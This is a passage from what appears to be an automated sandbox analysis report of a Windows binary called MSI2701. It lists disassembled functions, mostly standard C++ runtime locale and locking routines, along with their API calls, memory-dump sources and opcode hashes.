                                                                                                                                                            • Instruction Fuzzy Hash: A651E37290028ABBEB204F66CD44FAF7BADFF04742F15415AFE01A6290D7B89D00DB64
                                                                                                                                                            Function 004C8610 Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004C8657
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004C8679
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004C86A1
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000044,00000000,C7C71CC4,?,00000000), ref: 004C86F9
                                                                                                                                                            • __Getctype.LIBCPMT ref: 004C877B
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004C87E4
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004C880E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2372200979-0
                                                                                                                                                            • Opcode ID: 228dc56acc035fc238408c22da3ae5c9302f180b32a6038e48569a7b731611c3
                                                                                                                                                            • Instruction ID: f6fede9c006a5eb00357a74a53575bda780becbd645c452d4b54728dcb0c0f64
                                                                                                                                                            • Opcode Fuzzy Hash: 228dc56acc035fc238408c22da3ae5c9302f180b32a6038e48569a7b731611c3
                                                                                                                                                            • Instruction Fuzzy Hash: 0861CF75D00648DFDB51CF68C940BAEBBF0FB14314F24815ED845AB392EB38AA45CB95
                                                                                                                                                            Function 004C9270 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004C92A0
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004C92C2
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004C92EA
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000018,00000000,C7C71CC4,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004C9342
                                                                                                                                                            • __Getctype.LIBCPMT ref: 004C93BD
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004C93F8
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004C9422
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2372200979-0
                                                                                                                                                            • Opcode ID: 809e96dd9c4fb2bfab303a1ded47f911b5a738a6d62fa4db07dec2862772d651
                                                                                                                                                            • Instruction ID: 166149e8933bd2f3a8394a8af6148ebb5db3270da9b17b86fe3d01837c2071b7
                                                                                                                                                            • Opcode Fuzzy Hash: 809e96dd9c4fb2bfab303a1ded47f911b5a738a6d62fa4db07dec2862772d651
                                                                                                                                                            • Instruction Fuzzy Hash: 7951CA74D04249EFCB11CF68C548B9EBBF0EB18704F24859EE801AB391D778AE05CB94
                                                                                                                                                            Function 004C6FB0 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 77COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 004C6FB7
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                            • String ID: <SQ$<SQ$<SQ$> returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                                            • API String ID: 1452528299-1666677208
                                                                                                                                                            • Opcode ID: 1a56ad0e1ab9ea589fdb2ae7e6485027b48a0704642b99c260bff036f2cbd2e4
                                                                                                                                                            • Instruction ID: ffd8eca564a102f8f0504ea5c6ca3ec592156f212949c5a6c37b47d8722bfc95
                                                                                                                                                            • Opcode Fuzzy Hash: 1a56ad0e1ab9ea589fdb2ae7e6485027b48a0704642b99c260bff036f2cbd2e4
                                                                                                                                                            • Instruction Fuzzy Hash: 4921AF5DA10261C3DBB01F298400B7AA6E0AF54758F65086FD8C8D7390FABD8C828399
                                                                                                                                                            Function 004CD87C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004CD883
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CD88D
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • numpunct.LIBCPMT ref: 004CD8C7
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004CD8DE
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CD8FE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 743221004-2395104290
                                                                                                                                                            • Opcode ID: c8a9f8b471f2f656245ac47006fe0a647c49a3d7a930973edf36bf572e2d3159
                                                                                                                                                            • Instruction ID: e8d74cd139970b5a8aa697ea7e8d3df25d68516ea3b8f40508e2a41efb8440de
                                                                                                                                                            • Opcode Fuzzy Hash: c8a9f8b471f2f656245ac47006fe0a647c49a3d7a930973edf36bf572e2d3159
                                                                                                                                                            • Instruction Fuzzy Hash: 0311A039D00215ABCB05AB619415BBE7761BF94714F24446FE4106B3D1CF789E058BA9
                                                                                                                                                            Function 004D22FA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2301
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D230B
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • codecvt.LIBCPMT ref: 004D2345
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D235C
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D237C
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 712880209-2395104290
                                                                                                                                                            • Opcode ID: 9e14de3b48a56906e206382d7fdeaed8e79697a54f3405d804cefd46a6291fb7
                                                                                                                                                            • Instruction ID: b1f5216a9b9aa7ae259e43d48697fbb467eabf2a5daf4113eededbb24429e489
                                                                                                                                                            • Opcode Fuzzy Hash: 9e14de3b48a56906e206382d7fdeaed8e79697a54f3405d804cefd46a6291fb7
                                                                                                                                                            • Instruction Fuzzy Hash: 8101ED3580011A9BCB01AB61A815BBEB7B0BF90714F24040FF900AB391CF7C9E018BA9
                                                                                                                                                            Function 004D238F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2396
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D23A0
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • codecvt.LIBCPMT ref: 004D23DA
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D23F1
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2411
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 712880209-2395104290
                                                                                                                                                            • Opcode ID: 28ea1aee4e05273e832bc6beac202a6f89f27a46fb310e688778b181cfe7f1d0
                                                                                                                                                            • Instruction ID: 628e5e794c76e97ce82be25a5998fa821cdce87cc9a7afb6ed83b273033e44e1
                                                                                                                                                            • Opcode Fuzzy Hash: 28ea1aee4e05273e832bc6beac202a6f89f27a46fb310e688778b181cfe7f1d0
                                                                                                                                                            • Instruction Fuzzy Hash: B6010035A0011A9BCB05EB618925BBE77B0BF90714F24044FE810A7392CFBC9E05CBA9
                                                                                                                                                            Function 004D2424 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D242B
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2435
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • collate.LIBCPMT ref: 004D246F
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2486
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D24A6
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 1007100420-2395104290
                                                                                                                                                            • Opcode ID: 5419063eb3e6199764bbc1828a0b2019a4c001dc9dfad6388a956b1ca387edc9
                                                                                                                                                            • Instruction ID: 10ffdef586a934e7500ba6eabb73487d0ed9c19d256c06d07d9babb7fc432f1e
                                                                                                                                                            • Opcode Fuzzy Hash: 5419063eb3e6199764bbc1828a0b2019a4c001dc9dfad6388a956b1ca387edc9
                                                                                                                                                            • Instruction Fuzzy Hash: D101AD75900119ABCB05AB61D925BBE7BB0BF94724F24044FE9006B391DFB89E05CBA9
                                                                                                                                                            Function 004D24B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D24C0
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D24CA
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • collate.LIBCPMT ref: 004D2504
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D251B
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D253B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 1007100420-2395104290
                                                                                                                                                            • Opcode ID: 95a76fa284abd048fbbed08e9a14cde629a34c9286c4831b22f88997c16bb7cd
                                                                                                                                                            • Instruction ID: 8c5426264f3af8d6fd3ab26ed022eaa6682f31c6797fbcc3b9edfb44f7686c2f
                                                                                                                                                            • Opcode Fuzzy Hash: 95a76fa284abd048fbbed08e9a14cde629a34c9286c4831b22f88997c16bb7cd
                                                                                                                                                            • Instruction Fuzzy Hash: CE010435900115EBCB05EB65D825BBE77B0BF94715F24044FE4006B391CF789E018B99
                                                                                                                                                            Function 004D254E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2555
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D255F
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • ctype.LIBCPMT ref: 004D2599
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D25B0
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D25D0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 83828444-2395104290
                                                                                                                                                            • Opcode ID: f1cff204904e1cf6aaa0a609dda34447d74cbaa766fcd6b2c11a82152ae8046d
                                                                                                                                                            • Instruction ID: 465c7d5eec57227d795492391f4ee895e0d0570d2a94b08a171199ea6426d818
                                                                                                                                                            • Opcode Fuzzy Hash: f1cff204904e1cf6aaa0a609dda34447d74cbaa766fcd6b2c11a82152ae8046d
                                                                                                                                                            • Instruction Fuzzy Hash: AB01ED35900119EBCB01EB619825BBE77B0BF94314F24040FE400AB392DF789E048BA9
                                                                                                                                                            Function 004D25E3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D25EA
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D25F4
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • messages.LIBCPMT ref: 004D262E
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2645
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2665
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2750803064-2395104290
                                                                                                                                                            • Opcode ID: aebd71120db6553cbe9e801560ffe9cc37811a0153b3820d42916466b6693686
                                                                                                                                                            • Instruction ID: ed64d3f00ca29597eee2bd3db0cf1bbd05d388baee09056562976a18d0a174c0
                                                                                                                                                            • Opcode Fuzzy Hash: aebd71120db6553cbe9e801560ffe9cc37811a0153b3820d42916466b6693686
                                                                                                                                                            • Instruction Fuzzy Hash: E501C0359002199BCB05EF619825BBE7BB0BFA4715F24444FF4006B391CFB89E05CBA9
                                                                                                                                                            Function 004D2678 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D267F
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2689
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • messages.LIBCPMT ref: 004D26C3
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D26DA
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D26FA
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2750803064-2395104290
                                                                                                                                                            • Opcode ID: 02473015467922f0c75f7de3a66df96035650740186416f7c9cb84b558b6a0cd
                                                                                                                                                            • Instruction ID: a601f4206100ee6435a53fcdabf8d4ad442f9122650b28b1925baaac2e25aa69
                                                                                                                                                            • Opcode Fuzzy Hash: 02473015467922f0c75f7de3a66df96035650740186416f7c9cb84b558b6a0cd
                                                                                                                                                            • Instruction Fuzzy Hash: 7101C035900219AFCB05EB65C915BBEB7B0BF94714F24444FE5006B392CFB8EE059BA9
                                                                                                                                                            Function 004CD6BD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004CD6C4
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CD6CE
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • codecvt.LIBCPMT ref: 004CD708
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004CD71F
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CD73F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 712880209-2395104290
                                                                                                                                                            • Opcode ID: cc8eac70816d511f9816705f7552bcb1d01a871e5afa9ae3f87f4987a20278c0
                                                                                                                                                            • Instruction ID: 99898c08062ed16c4a641458226155745326c39c5cdb15d33cf4c23544a20c39
                                                                                                                                                            • Opcode Fuzzy Hash: cc8eac70816d511f9816705f7552bcb1d01a871e5afa9ae3f87f4987a20278c0
                                                                                                                                                            • Instruction Fuzzy Hash: 0E01C439D001159BCB05EB618855BBE77B0FF94714F24041FE400673D2CF789E018B99
                                                                                                                                                            Function 004DE843 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DE84A
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DE854
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • collate.LIBCPMT ref: 004DE88E
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DE8A5
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DE8C5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
